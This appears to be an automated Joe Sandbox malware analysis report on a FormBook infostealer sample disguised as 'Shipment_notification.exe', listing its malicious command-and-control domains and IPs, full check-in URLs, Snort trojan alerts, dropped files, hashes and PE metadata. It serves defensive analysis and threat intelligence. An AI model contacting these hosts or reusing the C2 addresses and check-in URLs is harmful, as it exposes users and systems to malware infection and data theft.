                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlShipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.320065711.00000000055AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.com/designers/cabarga.htmlPShipment_notification.exe, 00000000.00000003.320681722.0000000005578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.carterandcone.comxShipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.searchvity.com/control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmptrue
                                                                          • URL Reputation: malware
                                                                          		unknown
                                                                          http://www.jiyu-kobo.co.jp/Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.zhongyicts.com.cno.Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.fontbureau.com/designers8Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.53876.world/rs5b/explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.peramid.xyzexplorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=10W12dX.4.drfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              198.177.124.57
                                                                              		www.peramid.xyzUnited States
                                                                              		395681FINALFRONTIERVGtrue
                                                                              206.54.190.30
                                                                              		carcosainvest.comUnited States
                                                                              		40824WZCOM-UStrue
                                                                              154.218.155.8
                                                                              		www.ywtxsm.comSeychelles
                                                                              		62468VPSQUANUStrue
                                                                              185.27.134.217
                                                                              		www.isabellagambitta.comUnited Kingdom
                                                                              		34119WILDCARD-ASWildcardUKLimitedGBtrue
                                                                              66.96.161.158
                                                                              		www.drkathleensanders.comUnited States
                                                                              		29873BIZLAND-SDUStrue
                                                                              199.59.243.223
                                                                              		www.piergitarshoes.comUnited States
                                                                              		395082BODIS-NJUStrue
                                                                              45.114.105.2
                                                                              		www.locationsbormes.comChina
                                                                              		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue

                                                                              General Information

                                                                              Joe Sandbox Version:37.0.0 Beryl
                                                                              Analysis ID:830738
                                                                              Start date and time:2023-03-20 16:47:46 +01:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 12m 7s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:7
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:1
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample file name:Shipment_notification.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@10/3@12/7
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HDC Information:
                                                                              • Successful, ratio: 66.3% (good quality ratio 58.6%)
                                                                              • Quality average: 70.8%
                                                                              • Quality standard deviation: 33.1%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 56
                                                                              • Number of non-executed functions: 127
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              16:48:55API Interceptor1x Sleep call for process: Shipment_notification.exe modified
                                                                              16:49:00API Interceptor838x Sleep call for process: explorer.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              198.177.124.57INVOICE_#2736.exeGet hashmaliciousFormBookBrowse
                                                                              • www.gomarketing.info/bpg5/?JaU=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCOM7RJQDMioC0YzM4XAMPY42HB&G3=nb4FI3S6Ge8yTg
                                                                              Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • www.peramid.xyz/rs5b/?C4hBTriK=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrAotKTmwtbQRj0ZoQdqytr/09&-vA=9zxfH-hql
                                                                              Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • www.peramid.xyz/rs5b/?0N=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLqUbpLTmAldVoHww==&SEl_lU=Vy7s_z2oR
                                                                              206.54.190.30Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • www.carcosainvest.com/rs5b/?C4hBTriK=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ0QudkIjgU7pxRJ1+paHLNP50&-vA=9zxfH-hql
                                                                              Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • www.carcosainvest.com/rs5b/?0N=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQIgjqckIToS+QVVg==&SEl_lU=Vy7s_z2oR
                                                                              bart.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                              • www.carcosainvest.com/08da/?Bj=ljK7fJ7pFz0Tx1ZeFh9vJu0MWKRAY+mBUVP1xfWjGKN8gfJvQbWSGkV8vxtWvXLLUyIRAcuCQh9fgfcYRSyze4SEP5uJq2zJdA==&2e=ehl6Ce-WuqInmI9
                                                                              chiygf.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                              • www.carcosainvest.com/08da/?ctxXwh_=ljK7fJ7pFz0Tx1ZeFh9vJu0MWKRAY+mBUVP1xfWjGKN8gfJvQbWSGkV8vxtWvXLLUyIRAcuCQh9fgfcYRSyyUcOzGouBtQzscQ==&K-=wPcGbzFECMSws

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.piergitarshoes.comInquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 199.59.243.223
                                                                              Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 199.59.243.223
                                                                              www.isabellagambitta.comInquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 185.27.134.217
                                                                              Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 185.27.134.217
                                                                              ORDER_DETAILS_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 185.27.134.217
                                                                              PO_5751_YES.pdf.vbsGet hashmaliciousFormBookBrowse
                                                                              • 185.27.134.217
                                                                              JUSTIFICANTE_DE_TRANSFERENCIAPDF.vbsGet hashmaliciousFormBookBrowse
                                                                              • 185.27.134.217
                                                                              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 185.27.134.217
                                                                              www.peramid.xyzInquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 198.177.124.57
                                                                              Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 198.177.124.57

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              FINALFRONTIERVGINVOICE_#2736.exeGet hashmaliciousFormBookBrowse
                                                                              • 198.177.124.57
                                                                              Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 198.177.124.57
                                                                              https://ums.koreanair.com/Check.html?redirectUrl=9JRD01MTMy&U1RZUEU9TUFTUw=TElTVF9UQUJMRT1FTVNfTUFTU19TRU5EX0xJU1Q=E9TVF9JRD0yMDE5MDkyMzAwMDAy&VEM9MjAxOTEwMjM=0lORD1D&Q0lEPTAwMg=URL=https://ums.koreanair.com/Check.html?redirectUrl=9JRD01MTMy&U1RZUEU9TUFTUw=TElTVF9UQUJMRT1FTVNfTUFTU19TRU5EX0xJU1Q=E9TVF9JRD0yMDE5MDkyMzAwMDAy&VEM9MjAxOTEwMjM=0lORD1D&Q0lEPTAwMg=URL=https://foodforsoulfound.com/new/5civqi///lwhite@southeastbank.comGet hashmaliciousUnknownBrowse
                                                                              • 198.177.124.235
                                                                              Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 198.177.124.57
                                                                              https://shareasale.com/r.cfm?b=922594&u=1803968&m=68204&urllink=https://usaniivillageafrica.org/new/auth/fypkgm%2F%2F%2F%2Fjohn.doe@arcadia.ioGet hashmaliciousHTMLPhisherBrowse
                                                                              • 198.177.124.235
                                                                              Linux_amd64Get hashmaliciousUnknownBrowse
                                                                              • 23.234.195.6
                                                                              W29wJd8rZ5.exeGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              PO33273-CSFM.docGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              xWwkCdgUxd.exeGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              GT234A.docGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              5hRmxcH6pe.exeGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              QR243318HY.docGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              XI28934.docGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              lZdy9v3sd7.exeGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              PI 99-14.doc__.rtfGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              71ZfTBzjYG.exeGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              coff.exeGet hashmaliciousSmokeLoaderBrowse
                                                                              • 198.177.124.19
                                                                              WZCOM-USInquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 206.54.190.30
                                                                              Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                              • 206.54.190.30
                                                                              bart.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                              • 206.54.190.30
                                                                              chiygf.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                              • 206.54.190.30
                                                                              mgAj1bD1FN.elfGet hashmaliciousMiraiBrowse
                                                                              • 74.117.176.209
                                                                              https://downloaders.software/index-install.htmlGet hashmaliciousUnknownBrowse
                                                                              • 208.88.224.98
                                                                              https://bartender-ultralite.software.informer.com/download/?ca1a3d4dGet hashmaliciousUnknownBrowse
                                                                              • 204.155.159.109
                                                                              3SJiSVf4fz.elfGet hashmaliciousMirai, MoobotBrowse
                                                                              • 74.117.176.220
                                                                              https://www.getsnotes.com/en/app/download.php?file=downloadGet hashmaliciousUnknownBrowse
                                                                              • 204.155.149.140
                                                                              Linux_amd64Get hashmaliciousUnknownBrowse
                                                                              • 199.80.53.4
                                                                              T2yiUxKp5R.elfGet hashmaliciousMiraiBrowse
                                                                              • 67.216.86.255
                                                                              jdp03FGDcV.elfGet hashmaliciousMiraiBrowse
                                                                              • 69.41.186.226
                                                                              http://bowtiexp.software.informer.comGet hashmaliciousUnknownBrowse
                                                                              • 204.155.159.109
                                                                              dHR8d6DazM.elfGet hashmaliciousUnknownBrowse
                                                                              • 74.117.176.207
                                                                              https://zoomcloudcomputing.tech/index.php?uid=9871d3a2c554b27151cacf1422eec048Get hashmaliciousUnknownBrowse
                                                                              • 199.101.134.238
                                                                              https://dolphin-app-gmqrc.ondigitalocean.app/c0678e7d922226400010b5657b4f5159/?client_id=0000007990-0000-0lty-ij00-000000000&y=6eamRuYXBpZXJAaGVuaWZmLmNvbQ%3D%3D&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&resource=client_id&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=0&client-request-id=45f4d5f9-4657-4816-9528-af3f59994174&protectedtoken=trueGet hashmaliciousUnknownBrowse
                                                                              • 204.155.149.145
                                                                              http://shigaxapo.com/c/D.9D6/bA2D5hlJSnWaQf9AN/DsEP0/MCTdgo2cN-i/0/0oM/T/Q/xoOsDJYX3vGet hashmaliciousUnknownBrowse
                                                                              • 74.117.179.8
                                                                              x86_64-20220816-1116Get hashmaliciousMiraiBrowse
                                                                              • 64.87.35.87
                                                                              http://shigaxapo.comGet hashmaliciousUnknownBrowse
                                                                              • 74.117.179.8
                                                                              arm7-20220727-1310Get hashmaliciousMiraiBrowse
                                                                              • 72.249.116.16

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipment_notification.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.355304211458859
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                              Malicious:true
                                                                              Reputation:high, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                              C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):984
                                                                              Entropy (8bit):5.2414849034866355
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
                                                                              MD5:4816271302882BDFB06EE40F624169D1
                                                                              SHA1:A8F07F0A5940C4A9D4DAD112787FE109CCACA869
                                                                              SHA-256:26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
                                                                              SHA-512:3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}

                                                                              C:\Users\user\AppData\Local\Temp\10W12dX

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\control.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):94208
                                                                              Entropy (8bit):1.287139506398081
                                                                              Encrypted:false
                                                                              SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                              MD5:292F98D765C8712910776C89ADDE2311
                                                                              SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                              SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                              SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.8691620331810155
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:Shipment_notification.exe
                                                                              File size:772096
                                                                              MD5:c310a64af890ac32abff89e86cb53a33
                                                                              SHA1:509cdec4d058011fb55535a936e56d3158f3f05a
                                                                              SHA256:90e86051c2fb04a3f6fda85273580abca9a9131fb5e32065f620c4410febe1af
                                                                              SHA512:095334ee039c7c70b5459b16f1e8d66b56cb7847d3769859182ef5764a8fcb6720cddbc20fc7b5a2c87a6ec4141a70b537e59e27f7fd2ff57c0c325e1b803fce
                                                                              SSDEEP:12288:PIrmYMUnFW/NObV55FbasbtrKnnRy50vHKB0otonixVtd/FmQSBhVa8i6NFJHKoR:PIrUUj5FbfVoy5hB0hnixT9FHI04qooW
                                                                              TLSH:1AF402206B975636F13523BD85E46296A77EB3A62B13C54D14F212CE1B23F0349D1A3F
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0.................. ........@.. ....................... ............@................................

                                                                              File Icon

                                                                              Icon Hash:209480e66eb84902

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4bd0fa
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6417DEA8 [Mon Mar 20 04:18:48 2023 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbd0a80x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x1110.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xbbc980x54.text
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000xbb1000xbb200False0.9291656229124916data7.877600970637655IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xbe0000x11100x1200False0.7309027777777778data6.633661427958474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xc00000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_ICON0xbe1000xa79PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                              RT_GROUP_ICON0xbeb8c0x14data
                                                                              RT_VERSION0xbebb00x360data
                                                                              RT_MANIFEST0xbef200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              192.168.2.5198.177.124.5749706802031453 03/20/23-16:50:29.247456TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.5198.177.124.57
                                                                              192.168.2.5199.59.243.22349702802031453 03/20/23-16:50:05.917395TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.5199.59.243.223
                                                                              192.168.2.5198.177.124.5749706802031412 03/20/23-16:50:29.247456TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.5198.177.124.57
                                                                              192.168.2.5154.218.155.849704802031453 03/20/23-16:50:21.020230TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970480192.168.2.5154.218.155.8
                                                                              192.168.2.5198.177.124.5749706802031449 03/20/23-16:50:29.247456TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.5198.177.124.57
                                                                              192.168.2.5154.218.155.849704802031412 03/20/23-16:50:21.020230TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970480192.168.2.5154.218.155.8
